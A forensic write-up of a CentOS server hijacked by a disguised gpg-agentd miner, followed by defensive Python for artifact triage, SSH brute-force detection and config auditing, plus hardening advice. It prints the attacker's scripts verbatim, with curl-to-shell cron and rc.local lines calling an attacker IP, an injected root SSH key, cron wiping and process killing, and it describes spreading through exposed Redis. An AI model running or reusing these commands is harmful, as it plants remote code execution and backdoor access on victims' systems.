How a Hidden gpg-agentd Process Hijacked a CentOS Server and Spread via Redis and Masscan
A detailed forensic walkthrough reveals how a compromised CentOS server was hijacked via a disguised gpg-agentd process, leveraged cron jobs to download malicious scripts, abused Redis for persistence, and used masscan for rapid scanning, followed by practical security recommendations to harden servers and Redis instances.
0x00 Background
On a Monday morning the author discovered that a server in the office could not be logged into. The server, a CentOS 6.x machine running nginx, tomcat and redis, had its SSH port 22 blocked by Alibaba Cloud for "malicious outbound traffic". After changing the port the author could log in as root; the root account was protected only by a weak password, which pointed to a compromise.
0x01 Finding Clues
Running ps eho command -p 23374 and netstat -pan | grep 23374 revealed a process named gpg-agentd consuming 99% CPU. The name mimics the legitimate gpg-agent but the trailing d suggests a disguised malicious binary.
Further investigation showed two cron jobs that download a script from http://159.89.190.243/ash.php every 15 minutes.
0x02 Motive
The downloaded script (ash.sh) contains the following commands:
uname -aid
hostnames
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redis' > /root/.ssh/authorized_keys
echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/root
echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/crontabs/root
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/null
The script disables SELinux, raises file descriptor and process limits, wipes the existing cron tables and replaces them with its own download‑and‑execute entries, installs a persistent SSH public key for password‑less root login, installs bash, and then fetches a second script (bsh.php).
The second script (bsh.php) performs the following actions:
sleep $(seq 3 7 | sort -R | head -n1)
cd /tmp || cd /var/tmp
mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/...
sleep 1
if [ -f .watch ]; then rm -rf .watch; exit 0; fi
sleep 1
echo 1 > .watch
sleep 1
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null
sleep 1
if ! [ -x /usr/bin/gpg-agentd ]; then
curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db
echo '/usr/bin/gpg-agentd' > /etc/rc.local
echo 'curl -fsSL 159.89.190.243/ash.php|sh' >> /etc/rc.local
echo 'exit 0' >> /etc/rc.local
fi
chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd
sleep 1
if ! [ -x "$(command -v masscan)" ]; then
apt-get update -y
apt-get install -y build-essential libpcap0.8-dev libpcap0.8 make gcc git redis-server redis-tools redis iptables wget curl
yum install -y epel-release git iptables make gcc redis libpcap libpcap-devel wget curl
fi
curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
sleep 3 && rm -rf .watch
bash -c 'curl -fsSL 159.89.190.243/rsh.php|bash' 2>/dev/null
The script kills processes matching a list of competing tool names, drops the gpg-agentd binary (served as dump.db) into /usr/bin with an /etc/rc.local entry so it survives a reboot, downloads and compiles the open‑source scanner masscan, installs it, and finally fetches a third script (rsh.php) that uses masscan to scan the Internet for open Redis instances on port 6379. Detected hosts are queried with redis-cli to write a malicious configuration that injects an SSH public key into /root/.ssh/authorized_keys, granting the attacker password‑less access.
MASSCAN: the fastest Internet port scanner, capable of scanning the entire IPv4 space in under six minutes at 10 million packets per second. It produces results similar to Nmap but uses an asynchronous custom TCP/IP stack.
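The two scripts above leave a small, recognisable set of artifacts on disk: cron entries and an rc.local that pipe a download straight into a shell, a binary whose name mimics a legitimate daemon, and an unfamiliar key in authorized_keys. The following triage helper is an added example for this write-up (not code from the original article or from the attacker's scripts); it scans the text of those three artifacts and reports each indicator. All sample inputs are constructed: the IP 159.89.190.243 and the "redis" key comment are taken from the page, the key blob is shortened, and the baseline of legitimate daemon names is an assumption.

```python
"""Persistence-artifact triage for the infection described above (added example)."""
import re
from dataclasses import dataclass

# "curl ... | sh" / "wget ... | bash": fetch from the network, run immediately.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&\n]*\|\s*(ba)?sh\b", re.I)

# Assumed baseline of legitimate daemon names to compare lookalikes against.
LEGIT_NAMES = ("gpg-agent", "sshd", "crond", "redis-server")

# OpenSSH key-type prefixes recognised in authorized_keys.
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")


@dataclass(frozen=True)
class Finding:
    source: str  # which artifact the line came from
    line: str    # the offending line, stripped
    reason: str  # why it was flagged


def active_lines(text):
    """Yield non-empty, non-comment lines, stripped."""
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            yield line


def lookalike_of(name):
    """Return the legitimate name that `name` mimics by appending characters
    (e.g. /usr/bin/gpg-agentd -> gpg-agent), or None. Heuristic by design."""
    base = name.rsplit("/", 1)[-1]
    for legit in LEGIT_NAMES:
        if base != legit and base.startswith(legit):
            return legit
    return None


def scan_commands(text, source):
    """Flag download-to-shell pipelines and lookalike binaries in a script or crontab."""
    findings = []
    for line in active_lines(text):
        if PIPE_TO_SHELL.search(line):
            findings.append(Finding(source, line, "download piped to shell"))
        for tok in line.split():
            legit = lookalike_of(tok)
            if legit:
                findings.append(Finding(source, line, f"name mimics {legit}"))
                break
    return findings


def parse_authorized_key(line):
    """Split one authorized_keys line into (type, blob, comment); tolerates a
    leading options field. Returns None if no key type is found."""
    parts = line.split()
    for i, tok in enumerate(parts):
        if tok.startswith(KEY_TYPES) and i + 1 < len(parts):
            return tok, parts[i + 1], " ".join(parts[i + 2:])
    return None


def scan_authorized_keys(text, allowed_keys):
    """Flag every key whose 'type blob' pair is not on the allow-list."""
    findings = []
    for line in active_lines(text):
        parsed = parse_authorized_key(line)
        if parsed is None:
            findings.append(Finding("authorized_keys", line, "unparseable entry"))
            continue
        ktype, blob, comment = parsed
        if f"{ktype} {blob}" not in allowed_keys:
            shown = f"{ktype} ...{blob[-12:]} {comment}".strip()
            findings.append(Finding("authorized_keys", shown, "key not on allow-list"))
    return findings


def triage(crontab, rc_local, authorized_keys, allowed_keys):
    """Run all checks and return the combined list of findings."""
    return (scan_commands(crontab, "crontab")
            + scan_commands(rc_local, "rc.local")
            + scan_authorized_keys(authorized_keys, allowed_keys))


# Constructed samples modelled on the artifacts described in the write-up.
SAMPLE_CRONTAB = """\
*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh
0 3 * * * /usr/local/bin/rotate-logs.sh
"""
SAMPLE_RC_LOCAL = """\
#!/bin/sh
/usr/bin/gpg-agentd
curl -fsSL 159.89.190.243/ash.php|sh
exit 0
"""
SAMPLE_AUTH_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKeyForThisDemo admin@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6 redis
"""
ALLOWED_KEYS = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKeyForThisDemo"}

if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB, SAMPLE_RC_LOCAL, SAMPLE_AUTH_KEYS, ALLOWED_KEYS):
        print(f"[{f.source}] {f.reason}: {f.line}")
```

On a live host the three inputs would be read from /var/spool/cron/*, /etc/rc.local and each user's authorized_keys; the allow-list of known administrator keys is the piece that must come from outside the compromised machine, since the attacker's script rewrites the file.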
0x03 Summary
The three scripts together illustrate a typical ransomware‑like infection chain: a disguised gpg-agentd binary gains root access, installs a persistent SSH key, repeatedly pulls and executes remote binaries, and finally abuses an unauthenticated Redis server to propagate across the network. Log analysis shows many failed SSH login attempts, indicating the initial compromise was likely a brute‑force attack on the root account.
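The summary points at failed SSH logins as the likely entry point. The detection below is an added example for this write-up (not code from the original article): it groups sshd "Failed password" and "Accepted password" events from /var/log/secure by source address, reports sources that exceed a failure threshold inside a time window, and notes whether one of those sources later logged in successfully, the pattern that means a guessed password worked. The log lines are constructed in the CentOS 6 syslog format with documentation-range addresses; the threshold, window and the year supplied to the parser are assumptions.

```python
"""Brute-force triage over /var/log/secure lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# syslog prefix (no year) + sshd message, as written to /var/log/secure.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$")


def parse_line(line, year=2000):
    """Return (timestamp, result, user, ip) or None for lines that are not
    password-auth events. syslog omits the year, so one is supplied (assumed)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=10)):
    """Return {ip: summary} for every source with at least `threshold`
    failures inside any `window`-long span. The summary also lists accepted
    logins from that source after its first failure."""
    events = sorted(e for e in (parse_line(l) for l in lines) if e)
    by_ip = defaultdict(list)
    for ts, result, user, ip in events:
        by_ip[ip].append((ts, result, user))

    alerts = {}
    for ip, evs in by_ip.items():
        fails = [ts for ts, r, _ in evs if r == "Failed"]
        # Largest number of failures inside one sliding window.
        peak, start = 0, 0
        for end in range(len(fails)):
            while fails[end] - fails[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        alerts[ip] = {
            "failures": len(fails),
            "peak_in_window": peak,
            "users": sorted({u for _, r, u in evs if r == "Failed"}),
            "accepted_after_failures": [
                u for ts, r, u in evs if r == "Accepted" and ts >= fails[0]],
        }
    return alerts


# Constructed sample: a short burst against root, then a normal user login.
SAMPLE_SECURE = """\
Mar  5 02:14:01 web01 sshd[4021]: Failed password for root from 203.0.113.45 port 51234 ssh2
Mar  5 02:14:03 web01 sshd[4023]: Failed password for root from 203.0.113.45 port 51236 ssh2
Mar  5 02:14:04 web01 sshd[4025]: Failed password for invalid user admin from 203.0.113.45 port 51238 ssh2
Mar  5 02:14:06 web01 sshd[4027]: Failed password for root from 203.0.113.45 port 51240 ssh2
Mar  5 02:14:08 web01 sshd[4029]: Failed password for root from 203.0.113.45 port 51242 ssh2
Mar  5 02:14:09 web01 sshd[4031]: Failed password for root from 203.0.113.45 port 51244 ssh2
Mar  5 02:14:11 web01 sshd[4033]: Accepted password for root from 203.0.113.45 port 51246 ssh2
Mar  5 02:20:30 web01 sshd[4100]: Failed password for deploy from 198.51.100.7 port 40010 ssh2
Mar  5 02:20:41 web01 sshd[4102]: Accepted password for deploy from 198.51.100.7 port 40012 ssh2
Mar  5 02:21:00 web01 sshd[4105]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
"""

if __name__ == "__main__":
    for ip, summary in detect_bruteforce(SAMPLE_SECURE.splitlines()).items():
        print(ip, summary)
```

The "accepted_after_failures" field is the one worth alerting on: a source that fails repeatedly and then succeeds as root is exactly the sequence that precedes the cron and authorized_keys changes described in 0x02.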
0x04 Security Recommendations
Server hardening
Disable direct root login.
Enforce strong, complex passwords for all accounts.
Change the default SSH port from 22.
Deploy tools such as DenyHosts to block brute‑force attempts.
Prefer key‑based authentication and disable password authentication.
Redis hardening
Bind Redis only to localhost; avoid exposing 0.0.0.0.
Set a strong password for Redis access.
Run Redis under a low‑privilege, non‑root user.
By applying these measures the likelihood of similar compromises can be greatly reduced.
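A configuration audit that checks an sshd_config and a redis.conf against the recommendations above, shown as an added example for this write-up (not code from the original article). It flags root login, password authentication and the default port in sshd_config, and a Redis instance that is not bound to loopback or has no password; it also flags a Redis dir/dbfilename that points at an SSH key file, which is what the abuse described in 0x02 leaves behind. The weak and hardened snippets are constructed; the 16-character minimum and port 2222 are assumptions, and the requirepass value is a placeholder to be replaced with a random secret. Running Redis as a non-root user is a process property this file cannot see.

```python
"""Audit sshd_config and redis.conf against the hardening advice (added example)."""

MIN_SECRET_LEN = 16  # assumed minimum length for a Redis password
LOOPBACK = {"127.0.0.1", "::1", "-::1", "localhost"}


def parse_kv(text, first_wins):
    """Parse the 'key value' lines shared by sshd_config and redis.conf.
    sshd honours the first occurrence of a keyword, Redis the last."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip().strip('"') if len(parts) > 1 else ""
        if first_wins and key in conf:
            continue
        conf[key] = value
    return conf


def audit_sshd(text):
    """Return the list of deviations from the SSH recommendations."""
    conf = parse_kv(text, first_wins=True)
    issues = []
    # OpenSSH on CentOS 6 defaults both of these to 'yes' when unset.
    if conf.get("permitrootlogin", "yes").lower() != "no":
        issues.append("PermitRootLogin is not 'no': direct root login allowed")
    if conf.get("passwordauthentication", "yes").lower() != "no":
        issues.append("PasswordAuthentication is not 'no': passwords can be guessed")
    if conf.get("port", "22") == "22":
        issues.append("Port is the default 22")
    return issues


def audit_redis(text):
    """Return the list of deviations from the Redis recommendations."""
    conf = parse_kv(text, first_wins=False)
    issues = []
    bind = conf.get("bind")
    if bind is None:
        issues.append("no bind directive: Redis listens on every interface")
    else:
        exposed = [a for a in bind.split() if a not in LOOPBACK]
        if exposed:
            issues.append(f"bind exposes non-loopback address: {' '.join(exposed)}")
    secret = conf.get("requirepass", "")
    if not secret:
        issues.append("requirepass not set: unauthenticated access")
    elif len(secret) < MIN_SECRET_LEN:
        issues.append(f"requirepass shorter than {MIN_SECRET_LEN} characters")
    if "/.ssh" in conf.get("dir", "") or conf.get("dbfilename", "dump.rdb") == "authorized_keys":
        issues.append("dir/dbfilename target an SSH key file: instance likely already abused")
    return issues


# Constructed: the exposed settings the attack relied on, and their hardened form.
WEAK_SSHD = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""
HARDENED_SSHD = """\
Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
"""
WEAK_REDIS = """\
bind 0.0.0.0
port 6379
dir /var/lib/redis
"""
HARDENED_REDIS = """\
bind 127.0.0.1
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, fn, text in [("sshd weak", audit_sshd, WEAK_SSHD),
                           ("sshd hardened", audit_sshd, HARDENED_SSHD),
                           ("redis weak", audit_redis, WEAK_REDIS),
                           ("redis hardened", audit_redis, HARDENED_REDIS)]:
        print(name, fn(text) or ["ok"])
```

Changing the SSH port is the weakest of these controls (the author's port was found regardless), so the audit treats it as a finding but the root-login and password-authentication checks are the ones that would have stopped this intrusion.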
Liangxu Linux
Liangxu, a self‑taught IT professional now working as a Linux development engineer at a Fortune 500 multinational, shares extensive Linux knowledge—fundamentals, applications, tools, plus Git, databases, Raspberry Pi, etc. (Reply “Linux” to receive essential resources.)
